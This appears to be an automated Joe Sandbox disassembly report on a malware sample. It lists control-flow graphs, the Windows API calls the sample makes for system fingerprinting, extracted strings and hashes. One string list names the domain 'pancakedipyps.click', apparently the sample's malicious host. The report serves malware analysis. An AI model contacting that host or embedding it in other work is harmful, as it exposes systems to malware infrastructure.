43da12-43da5f 98->103 100->84 104 43da89 100->104 101->95 105 43dac5-43dac7 102->105 106 43da9f-43dac3 102->106 103->90 104->80 105->90 106->90
                                        APIs
                                        • CoCreateInstance.OLE32(80838290,00000000,00000001,?,00000000), ref: 0043D572
                                        • SysAllocString.OLEAUT32 ref: 0043D608
                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043D646
                                        • SysAllocString.OLEAUT32 ref: 0043D6A8
                                        • SysAllocString.OLEAUT32 ref: 0043D765
                                        • VariantInit.OLEAUT32(?), ref: 0043D7D6
                                        • SysFreeString.OLEAUT32(00000000), ref: 0043DB5D
                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043DB95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                                        • String ID: fF$CfF$[B$[J$tu$yv${pqv
                                        • API String ID: 505850577-1972840126
                                        • Opcode ID: 3ddc2ead7565efc33bb403abcee38b0898e8d98e79c6cb4a9a4b1927beae507d
                                        • Instruction ID: dd13a90e2492ac68040bcad17eea3e7c9d23fbfdc89757e028f71a1dea91b727
                                        • Opcode Fuzzy Hash: 3ddc2ead7565efc33bb403abcee38b0898e8d98e79c6cb4a9a4b1927beae507d
                                        • Instruction Fuzzy Hash: 94621372A183108FE314CF68D88576BBBE1EFD5314F198A2DE4D58B390D7799809CB86

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 111 40e16e-40e1af call 409b70 CoUninitialize 114 40e1b0-40e216 111->114 114->114 115 40e218-40e242 114->115 116 40e250-40e298 115->116 116->116 117 40e29a-40e303 116->117 118 40e310-40e343 117->118 118->118 119 40e345-40e356 118->119 120 40e358-40e366 119->120 121 40e37b-40e383 119->121 122 40e370-40e379 120->122 123 40e385-40e386 121->123 124 40e39b-40e3a5 121->124 122->121 122->122 125 40e390-40e399 123->125 126 40e3a7-40e3ab 124->126 127 40e3bb-40e3c3 124->127 125->124 125->125 128 40e3b0-40e3b9 126->128 129 40e3c5-40e3c6 127->129 130 40e3db-40e3e5 127->130 128->127 128->128 133 40e3d0-40e3d9 129->133 131 40e3e7-40e3eb 130->131 132 40e3fb-40e407 130->132 134 40e3f0-40e3f9 131->134 135 40e421-40e54e 132->135 136 40e409-40e40b 132->136 133->130 133->133 134->132 134->134 138 40e550-40e577 135->138 137 40e410-40e41d 136->137 137->137 139 40e41f 137->139 138->138 140 40e579-40e5af 138->140 139->135 141 40e5b0-40e60a 140->141 141->141 142 40e60c-40e636 call 40c080 141->142 144 40e63b-40e655 142->144
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: Uninitialize
                                        • String ID: RYZ[$UGC9$Zb$c[i!$pancakedipyps.click$yD
                                        • API String ID: 3861434553-3553024370
                                        • Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                        • Instruction ID: 966cdb19ca8ac249a37a340b6d4c56d028db331cb6ce3dd003334f0be9ec8841
                                        • Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                        • Instruction Fuzzy Hash: C3C1FF7150C3D08BDB348F2598687ABBBE1AFD2304F084D6DD8D95B286D678450A8B96

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 145 421b30-421b7c call 4450f0 148 421b82-421bda call 414c00 call 4404b0 145->148 149 4222dd-4222ed 145->149 155 421bdc-421be7 148->155 156 421be9 155->156 157 421bee-421c03 155->157 158 421ca1-421ca9 156->158 159 421c05 157->159 160 421c0a-421c16 157->160 163 421cab 158->163 164 421cad-421cb7 158->164 161 421c92-421c95 159->161 160->161 162 421c18-421c88 call 442080 160->162 166 421c97 161->166 167 421c99-421c9c 161->167 172 421c8d 162->172 163->164 168 421cb9 164->168 169 421cbe-421cce 164->169 166->158 167->155 170 422272-422282 call 4404d0 168->170 171 421cd0-421cf0 169->171 182 422284-42228a 170->182 173 421f61 171->173 174 421cf6-421d16 171->174 172->161 176 421f63-421f66 173->176 177 421d1b-421d26 174->177 179 421f68-421f6c 176->179 180 421f6e-421f84 call 4404b0 176->180 177->177 181 421d28-421d2a 177->181 183 421f9c-421f9e 179->183 195 421f86-421f9a 180->195 196 421f88-421f93 180->196 185 421d2e-421d31 181->185 186 42228e-4222a2 182->186 187 42228c 182->187 191 421fa4-421fc0 183->191 192 42224b-422250 183->192 189 421d37-421db7 185->189 190 421dbc-421de3 call 4222f0 185->190 193 4222a6-4222ad 186->193 194 4222a4 186->194 187->149 189->185 212 421de5 190->212 213 421dea-421e22 190->213 198 421fc5-421fd0 191->198 201 422252-42225a 192->201 202 42225c-422260 192->202 199 4222cd-4222d0 193->199 200 4222af-4222c8 call 442080 193->200 194->199 195->183 207 422264-422268 196->207 198->198 209 421fd2-421fd6 198->209 203 4222d2-4222d4 199->203 204 4222d6-4222db 199->204 200->199 205 422262 201->205 202->205 203->149 204->182 205->207 207->171 211 42226e-422270 207->211 214 421fd8-421fdb 209->214 211->170 212->173 216 421e27-421e35 213->216 217 42200f-422027 214->217 218 421fdd-42200d 214->218 216->216 219 421e37 216->219 220 42202e-422039 217->220 218->214 223 421e39-421e3c 219->223 221 422040-422059 220->221 222 42203b 220->222 225 422060-42206c 221->225 226 42205b 221->226 224 42210e-422116 222->224 227 421eaa-421ec4 call 4222f0 223->227 228 421e3e-421ea8 223->228 232 42211a-422179 224->232 233 422118 224->233 230 4220fd-422102 225->230 231 422072-4220f3 call 442080 225->231 226->230 239 421ec6-421eca 227->239 240 421ecf-421ee6 227->240 228->223 236 422106-422109 230->236 237 422104 230->237 241 4220f8 231->241 238 42217b-42217e 232->238 233->232 236->220 237->224 242 4221d2-4221e2 238->242 243 422180-4221d0 238->243 239->176 246 421eea-421f5f call 408270 call 414850 call 408280 240->246 247 421ee8 240->247 241->230 244 4221e4-4221e8 242->244 245 422218-42221b 242->245 243->238 248 4221ea-4221f1 244->248 250 422234-42223a 245->250 251 42221d-422232 call 4404d0 245->251 246->176 247->246 252 4221f3-4221ff 248->252 253 422201-42220a 248->253 256 42223c-42223f 250->256 251->256 252->248 257 42220e 253->257 258 42220c 253->258 256->192 261 422241-422249 256->261 262 422214-422216 257->262 258->262 261->207 262->245
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID: !@$,$0$6$p$q$v
                                        • API String ID: 1279760036-585546663
                                        • Opcode ID: 68ded5a1127ff787cf997603004e9156167bbfc9199ee1ec6ad3b0f1b8bf95cb
                                        • Instruction ID: 8656d014051cfeae6f38fc6e5bc27d53fcdcc23dc9b32e8d9396b3c6709607b7
                                        • Opcode Fuzzy Hash: 68ded5a1127ff787cf997603004e9156167bbfc9199ee1ec6ad3b0f1b8bf95cb
                                        • Instruction Fuzzy Hash: 0122DD7170C790CFD3248B28D58036BBBE1BB95324F558A2EE5E9873D1D7B988418B4B

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 267 408a60-408a71 call 4416b0 270 408d05-408d07 ExitProcess 267->270 271 408a77-408a7e call 43a2c0 267->271 274 408d00 call 442000 271->274 275 408a84-408abb GetCurrentProcessId GetCurrentThreadId 271->275 274->270 276 408ac3-408b93 SHGetSpecialFolderPathW GetForegroundWindow 275->276 277 408abd-408ac1 275->277 279 408b95-408bb7 276->279 280 408bdc-408bef 276->280 277->276 281 408bb9-408bbb 279->281 282 408bbd-408bda 279->282 283 408bf0-408c1c 280->283 281->282 282->280 283->283 284 408c1e-408c4a call 4404b0 283->284 287 408c50-408c8b 284->287 288 408cc4-408ce2 call 40a170 287->288 289 408c8d-408cc2 287->289 292 408ce4 call 40d400 288->292 293 408cee-408cf5 288->293 289->287 296 408ce9 call 40c050 292->296 293->274 295 408cf7-408cfd call 408280 293->295 295->274 296->293
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 00408A84
                                        • GetCurrentThreadId.KERNEL32 ref: 00408A8E
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408B76
                                        • GetForegroundWindow.USER32 ref: 00408B8B
                                        • ExitProcess.KERNEL32 ref: 00408D07
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                        • String ID:
                                        • API String ID: 4063528623-0
                                        • Opcode ID: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
                                        • Instruction ID: 695b1043c619777a8863990e744e8888075fa37916c6100b3e536846f602c71f
                                        • Opcode Fuzzy Hash: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
                                        • Instruction Fuzzy Hash: E3616873B143140BD318AE799C1635AB6D39BC5314F0F863EA995EB7D1ED7888068389

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 300 42f716-42f73a 301 42f740-42f754 300->301 301->301 302 42f756-42f75d 301->302 303 42f77b-42fbcb 302->303 304 42f75f-42f763 302->304 307 42fbd0-42fbe4 303->307 305 42f770-42f779 304->305 305->303 305->305 307->307 308 42fbe6-42fbed 307->308 309 42fc0b-42fc17 308->309 310 42fbef-42fbf3 308->310 312 42fc31-42fc55 call 443b60 309->312 313 42fc19-42fc1b 309->313 311 42fc00-42fc09 310->311 311->309 311->311 317 42fc5a-42fcae GetPhysicallyInstalledSystemMemory 312->317 314 42fc20-42fc2d 313->314 314->314 316 42fc2f 314->316 316->312 318 42fcb0-42fcea 317->318 318->318 319 42fcec-42fd2f call 41dce0 318->319 322 42fd30-42fd75 319->322 322->322 323 42fd77-42fd7e 322->323 324 42fd80-42fd88 323->324 325 42fd9d 323->325 327 42fd90-42fd99 324->327 326 42fda1-42fda9 325->326 329 42fdbb-42fdc8 326->329 330 42fdab-42fdaf 326->330 327->327 328 42fd9b 327->328 328->326 332 42fdca-42fdd1 329->332 333 42fdeb-42fe57 329->333 331 42fdb0-42fdb9 330->331 331->329 331->331 334 42fde0-42fde9 332->334 335 42fe60-42fe85 333->335 334->333 334->334 335->335 336 42fe87-42fe8e 335->336 337 42fe90-42fe94 336->337 338 42feab-42feb8 336->338 341 42fea0-42fea9 337->341 339 42feba-42fec1 338->339 340 42fedb-42ff7a 338->340 342 42fed0-42fed9 339->342 341->338 341->341 342->340 342->342
                                        APIs
                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042FC65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: InstalledMemoryPhysicallySystem
                                        • String ID: 5$Tx+$bC
                                        • API String ID: 3960555810-2958649183
                                        • Opcode ID: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
                                        • Instruction ID: 57781aab13a08c1a066b8e14d20b5adcd793598ba32206fb76d556f76c65c1e4
                                        • Opcode Fuzzy Hash: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
                                        • Instruction Fuzzy Hash: 66B1C17050C3918AE7358F2990643ABFFE0AF93304F98496ED5C987392D7794409CB56

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 343 42fb7d-42fbcb call 437610 call 408280 349 42fbd0-42fbe4 343->349 349->349 350 42fbe6-42fbed 349->350 351 42fc0b-42fc17 350->351 352 42fbef-42fbf3 350->352 354 42fc31-42fcae call 443b60 GetPhysicallyInstalledSystemMemory 351->354 355 42fc19-42fc1b 351->355 353 42fc00-42fc09 352->353 353->351 353->353 360 42fcb0-42fcea 354->360 356 42fc20-42fc2d 355->356 356->356 358 42fc2f 356->358 358->354 360->360 361 42fcec-42fd2f call 41dce0 360->361 364 42fd30-42fd75 361->364 364->364 365 42fd77-42fd7e 364->365 366 42fd80-42fd88 365->366 367 42fd9d 365->367 369 42fd90-42fd99 366->369 368 42fda1-42fda9 367->368 371 42fdbb-42fdc8 368->371 372 42fdab-42fdaf 368->372 369->369 370 42fd9b 369->370 370->368 374 42fdca-42fdd1 371->374 375 42fdeb-42fe57 371->375 373 42fdb0-42fdb9 372->373 373->371 373->373 376 42fde0-42fde9 374->376 377 42fe60-42fe85 375->377 376->375 376->376 377->377 378 42fe87-42fe8e 377->378 379 42fe90-42fe94 378->379 380 42feab-42feb8 378->380 383 42fea0-42fea9 379->383 381 42feba-42fec1 380->381 382 42fedb-42ff7a 380->382 384 42fed0-42fed9 381->384 383->380 383->383 384->382 384->384
                                        APIs
                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042FC65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: InstalledMemoryPhysicallySystem
                                        • String ID: 5$Tx+$bC
                                        • API String ID: 3960555810-2958649183
                                        • Opcode ID: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
                                        • Instruction ID: c6dbd191573f8eaa778921652fb4887c0da57f4868ba9d7cab245032b22be67a
                                        • Opcode Fuzzy Hash: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
                                        • Instruction Fuzzy Hash: D0A1C17050C3918AE739CF2994603EBBFE0AF96304F58897ED5C987392D7794409CB56

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 385 40c080-40c2df 386 40c2e0-40c315 385->386 386->386 387 40c317-40c323 386->387 388 40c326-40c343 387->388
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 50$DM_e$FwPq$Js$'!
                                        • API String ID: 0-1711485358
                                        • Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                        • Instruction ID: a29f9b67a002a0f45ebf0d2c5d73cf8b9506a9b5be0e3ba76b97c1ae1caaee17
                                        • Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                        • Instruction Fuzzy Hash: C751DAB45493808FE334CF21C991B8BBBB1BBA1304F609A0CE6D95B654CB759446CF97

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 389 425713-425719 390 425722 389->390 391 42571b-425720 389->391 392 425725-425755 call 408270 RtlExpandEnvironmentStrings 390->392 391->392 395 425764-42576d 392->395 396 42575c 392->396 397 425776 395->397 398 42576f-425774 395->398 396->395 399 42577d-4257d2 call 408270 397->399 398->399 402 4257e0-425802 399->402 402->402 403 425804-42580c 402->403 404 425831-425845 403->404 405 42580e-425813 403->405 407 425861-42586f call 445260 404->407 408 425847-42584b 404->408 406 425820-42582f 405->406 406->404 406->406 411 425874-42587c 407->411 409 425850-42585f 408->409 409->407 409->409 412 425883-42588d 411->412 413 425a50 411->413 414 425896-42589f 411->414 412->414 418 425a56-425a7f 413->418 415 4258a1-4258a6 414->415 416 4258a8 414->416 417 4258af-425979 call 408270 415->417 416->417 423 425980-4259b6 417->423 420 425a80-425a92 418->420 420->420 422 425a94-425b2a 420->422 424 425b30-425b5f 422->424 423->423 425 4259b8-4259c3 423->425 424->424 426 425b61-425b84 call 4219a0 424->426 427 4259e1-4259ee 425->427 428 4259c5-4259ca 425->428 437 425b8c-425b92 call 408280 426->437 431 4259f0-4259f4 427->431 432 425a11-425a31 GetLogicalDrives call 445260 427->432 430 4259d0-4259df 428->430 430->427 430->430 434 425a00-425a0f 431->434 432->418 432->437 439 425bc2-425bc8 call 408280 432->439 440 425ba1-425ba9 call 408280 432->440 441 425d95 432->441 442 425a4a 432->442 443 425b9b 432->443 444 425a38-425a42 432->444 445 425bb9-425bbf call 408280 432->445 446 425d8f 432->446 447 425bac-425bb8 432->447 434->432 434->434 437->443 439->446 440->447 441->441 442->413 443->440 444->442 445->439 446->441
                                        APIs
                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00425743
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: EnvironmentExpandStrings
                                        • String ID: 67
                                        • API String ID: 237503144-1886922373
                                        • Opcode ID: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
                                        • Instruction ID: 69054aec17b57e4c885244c43c85c7a2a523591f4f2f134b8c84ae4bc1ca1ac0
                                        • Opcode Fuzzy Hash: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
                                        • Instruction Fuzzy Hash: 6EB1A9B4508710CBD7109F54E88176BBBE0FF86708F44496EE9849B391E7B9C949CB8B

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 455 437c10-437cf5 GetSystemMetrics * 2 461 437cfc-43812e 455->461
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: MetricsSystem
                                        • String ID:
                                        • API String ID: 4116985748-3916222277
                                        • Opcode ID: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
                                        • Instruction ID: 45907af0f9aaa3a0b9b12b1f6695193350465b50a920b4478e3ecda7c38bd9fb
                                        • Opcode Fuzzy Hash: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
                                        • Instruction Fuzzy Hash: 23C15BB05093808BE7B0DF64D99979BFBF1BB85308F10992EE5984B354C7B89449CF4A

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 464 418ba2-418c02 465 418c10-418c4c 464->465 465->465 466 418c4e-418c6e call 401dd0 465->466 469 418da0-418da6 call 408280 466->469 470 419040-419049 call 401f60 466->470 471 418d83-418d9c 466->471 472 418fa3-418fb0 466->472 473 418fe6-419010 call 41bdd0 466->473 474 418da9-418dba 466->474 475 419030 466->475 476 419050-419056 call 401f60 466->476 477 418c75-418ccb 466->477 478 418dd4-418de9 call 401e00 466->478 479 418fb7-418fc5 466->479 480 419018-419021 call 408280 466->480 481 41903a 466->481 469->474 470->476 485 418dbd-418dcd call 401df0 471->485 472->469 472->470 472->473 472->474 472->475 472->476 472->479 472->480 488 41905f-4195af 472->488 473->480 474->485 475->481 476->488 482 418cd0-418cf4 477->482 505 418e50 478->505 506 418deb-418df0 478->506 489 418fe1 479->489 490 418fc7-418fcf 479->490 480->475 481->470 482->482 493 418cf6-418d79 call 41bdd0 482->493 485->469 485->470 485->472 485->473 485->474 485->475 485->476 485->478 485->479 485->480 485->481 485->488 489->473 500 418fd0-418fdf 490->500 493->471 500->489 500->500 509 418e52-418e55 505->509 508 418e09-418e0b 506->508 510 418e00 508->510 511 418e0d-418e1e 508->511 512 418e60 509->512 513 418e57-418e5c 509->513 514 418e01-418e07 510->514 511->510 515 418e20-418e38 511->515 516 418e67-418eb2 call 408270 call 40aff0 512->516 513->516 514->508 514->509 515->510 518 418e3a-418e46 515->518 523 418ec0-418ec2 516->523 524 418eb4-418eb9 516->524 518->514 520 418e48-418e4b 518->520 520->514 525 418ec9-418ee4 call 408270 523->525 524->525 528 418f01-418f2f 525->528 529 418ee6-418eeb 525->529 531 418f30-418f4a 528->531 530 418ef0-418eff 529->530 530->528 530->530 531->531 532 418f4c-418f60 531->532 533 418f81-418f8f call 445260 532->533 534 418f62-418f67 532->534 537 418f94-418f9c 533->537 535 418f70-418f7f 534->535 535->533 535->535 537->469 537->470 537->472 537->473 537->474 537->475 537->476 537->479 537->480 537->488
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PWPQ$bd\,$fnga$oQ
                                        • API String ID: 0-3706350231
                                        • Opcode ID: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
                                        • Instruction ID: e34152e6636813154928bb160b9fd2834c9c91dba41fdab838839377217cf8bd
                                        • Opcode Fuzzy Hash: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
                                        • Instruction Fuzzy Hash: 1CC126766083408FD7258F24C8557AB77E6EFC6314F08892EE8998B391EF388841C787

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 538 428750-428771 539 428780-4287b1 538->539 539->539 540 4287b3-4287c0 539->540 541 4287c2-4287cf 540->541 542 428804-42882b 540->542 543 4287d0-4287d7 541->543 544 428830-428859 542->544 545 4287e0-4287e7 543->545 546 4287d9-4287dc 543->546 544->544 547 42885b-428861 544->547 545->542 549 4287e9-4287fc call 442080 545->549 546->543 548 4287de 546->548 550 428867-428894 call 4404b0 547->550 551 428998-4289a1 547->551 548->542 554 428801 549->554 556 4288a0-4288e5 550->556 554->542 556->556 557 4288e7-4288ee 556->557 558 4288f4-4288fa 557->558 559 428989-42898b 557->559 560 428900-428907 558->560 561 42898f-428995 call 4404d0 559->561 563 428910-428917 560->563 564 428909-42890c 560->564 561->551 563->559 567 428919-42892e call 442080 563->567 564->560 566 42890e 564->566 566->559 569 428933-42893a 567->569 569->561 570 42893c-428942 569->570 571 428950-42895b 570->571 571->571 572 42895d-428980 571->572 573 4289a2 572->573 574 428982-428987 572->574 575 4289a4-4289b1 call 408270 573->575 574->575 578 4289d0-4289da 575->578 579 4289c0-4289ce 578->579 580 4289dc-4289df 578->580 579->578 581 4289f3-4289f7 579->581 582 4289e0-4289ef 580->582 584 428b02-428b0b call 408280 581->584 585 4289fd-428a09 581->585 582->582 583 4289f1 582->583 583->579 584->561 587 428a0b-428a12 585->587 588 428a4d-428aa8 call 408270 call 409180 585->588 591 428a2c-428a30 587->591 601 428ab0-428add 588->601 592 428a32-428a3b 591->592 593 428a20 591->593 596 428a42-428a46 592->596 597 428a3d-428a40 592->597 595 428a21-428a2a 593->595 595->588 595->591 596->595 599 428a48-428a4b 596->599 597->595 599->595 601->601 602 428adf-428afe call 4092e0 call 408280 601->602 602->584
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: &76#$/X$BDE:
                                        • API String ID: 2994545307-3468712750
                                        • Opcode ID: bda00dd6b24e91b95935bd233f1bfdad870dd724f28d61ad92188f97a0c207be
                                        • Instruction ID: de511f14106650819994a34559177bbffe3ae858db635c904efe7b47fdd347f8
                                        • Opcode Fuzzy Hash: bda00dd6b24e91b95935bd233f1bfdad870dd724f28d61ad92188f97a0c207be
                                        • Instruction Fuzzy Hash: 4C9146B27093119BD3109F25EC8176FB6D2EBC5318F58813EE4858B381EA3C9846878B

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 607 430f54-430f62 608 430f64-430f6b 607->608 609 430f7b-430fef FreeLibrary call 443b60 607->609 610 430f70-430f79 608->610 615 430ff0-43100a 609->615 610->609 610->610 615->615 616 43100c-431016 615->616 617 43102b-4310a8 GetComputerNameExA 616->617 618 431018-43101f 616->618 620 4310af 617->620 619 431020-431029 618->619 619->617 619->619 620->620
                                        APIs
                                        • FreeLibrary.KERNEL32(?), ref: 00430F85
                                        • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0043104A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: ComputerFreeLibraryName
                                        • String ID:
                                        • API String ID: 2904949787-0
                                        • Opcode ID: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
                                        • Instruction ID: 7b7113e42e32beabe8c4c016577568230ad12c23f9774a4b5fe118adb1295c8a
                                        • Opcode Fuzzy Hash: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
                                        • Instruction Fuzzy Hash: 9531F33691C3D08BE3348F359C553EBBBE2ABC6314F19866DC8D857285DB7A1805CB86

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 621 430f4e-430fef FreeLibrary call 443b60 626 430ff0-43100a 621->626 626->626 627 43100c-431016 626->627 628 43102b-4310a8 GetComputerNameExA 627->628 629 431018-43101f 627->629 631 4310af 628->631 630 431020-431029 629->630 630->628 630->630 631->631
                                        APIs
                                        • FreeLibrary.KERNEL32(?), ref: 00430F85
                                        • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0043104A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: ComputerFreeLibraryName
                                        • String ID:
                                        • API String ID: 2904949787-0
                                        • Opcode ID: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
                                        • Instruction ID: fb4d1f38de1a85f36896b77157d4be4448694684cc70b9096da98958b1763f09
                                        • Opcode Fuzzy Hash: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
                                        • Instruction Fuzzy Hash: D931F23695C3908BE3348F359C953DBBBE2ABC6314F19862DC8D817284DB7A1805CB86
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
                                        • Instruction ID: fe71d1bcebcc68b075db47888e1e2cba677fa4d5c187ad294acff22be9a80e62
                                        • Opcode Fuzzy Hash: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
                                        • Instruction Fuzzy Hash: 1B51B9B16086428FC714CF58C4917ABF7E2ABD5304F18892EE4EA87342E739DD45CB86
                                        APIs
                                        • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0043104A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
                                        • Instruction ID: 4d6f8d4a3a0c9291bd82fbf102df9c74bb0e146b1c020dae9dd1e6f681f2a276
                                        • Opcode Fuzzy Hash: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
                                        • Instruction Fuzzy Hash: D921E1369583A04BE3348F359C913DBBBE2ABC6314F09872DC8D817285DB7A1805CBC6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: Y\]R
                                        • API String ID: 2994545307-2023185185
